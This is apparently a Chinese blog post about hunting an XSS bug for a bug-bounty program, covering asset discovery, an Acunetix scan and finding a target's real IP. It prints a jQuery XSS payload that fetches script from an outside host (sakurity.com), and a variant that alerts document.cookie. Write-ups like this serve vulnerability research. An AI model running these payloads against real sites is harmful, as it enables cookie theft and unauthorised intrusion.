当前位置: 首页 > article >正文

0x06 记录一次挖src的经历(xss漏洞)

漏洞平台:补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC

个人总结的挖洞流程:

1)先用工具信息收集一波

我这里先用灯塔收集一下目标资产

2)然后用漏洞扫描工具扫描一波

我这里用Acunetix进行扫描

因为工具扫描需要点时间,所以我们也可以先进行手动渗透测试

漏洞扫描结果出来了,我们就可以查看一下情况

3)最后我这里发现了xss注入

 我根据告警访问他引用的文章获取到了原始是payload:Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses · Issue #2432 · jquery/jquery · GitHub

$.get('http://sakurity.com/jqueryxss')

 我这里改造一下,然后拿到目标的控制台中执行

$.get('https://example.com/fakeurl')
    .done(function(data) {
        alert('远程连接成功,数据:' + data);
    })
    .fail(function() {
        alert(document.cookie);
    });

4)最后如果你要提交漏洞的话你还需要收集目标域名的真实ip的地址

这里可以用在线的多地ping网站:网速测试,测网速,网站速度测试,卡卡测速网—卡卡网 www.webkaka.com

 

获取真实ip 

有真实ip后就可以获取ip地址

iP地址查询--手机号码查询归属地 | 邮政编码查询 | iP地址归属地查询 | 身份证号码验证在线查询网 (ip138.com)

 或者用站长工具查:IP/服务器120.77.143.220的信息 - 站长工具 (chinaz.com)


http://www.kler.cn/a/295111.html

相关文章:

  • JQuery封装的ajax
  • ️️一篇快速上手 AJAX 异步前后端交互
  • 猿创征文|Inscode桌面IDE:打造高效开发新体验
  • 10款翻译工具实践体验感受与解析!!!!!
  • 记录学习react的一些内容
  • Autosar CP DDS规范导读
  • 【机器人工具箱Robotics Toolbox开发笔记(十六)】SCARA机器人关节空间轨迹规划仿真实例
  • 分类与回归的区别
  • JavaScript 根据关键字匹配数组项
  • C++(一)----C++基础
  • Linux中的Vim文本编辑器
  • 【Spring】获取cookie,session,header(3)
  • 有限体积法:基于一维稳态扩散问题及其程序实现
  • sping boot 基于 RESTful 风格,模拟增删改查操作
  • 【全网最全】2024年数学建模国赛A题30页完整建模文档+17页成品论文+保奖matla代码+可视化图表等(后续会更新)
  • 使用LSTM(长短期记忆网络)模型预测股票价格的实例分析
  • 复旦大学王龑团队发布《静态与动态情感的面部表情识别》综述
  • 漫谈设计模式 [5]:建造者模式
  • 通用内存快照裁剪压缩库Tailor介绍及源码分析(一)
  • ubuntu安装maven
  • C++可以被重载的操作符Overloadable operators
  • SpringBoot 依赖之 Spring for RabbitMQ
  • LabVIEW如何确保采集卡稳定运行
  • 基于SSM+Vue+MySQL的可视化高校公寓管理系统
  • 【Qt笔记】QUndoView控件详解
  • 大数据开发职场:理性分析拖延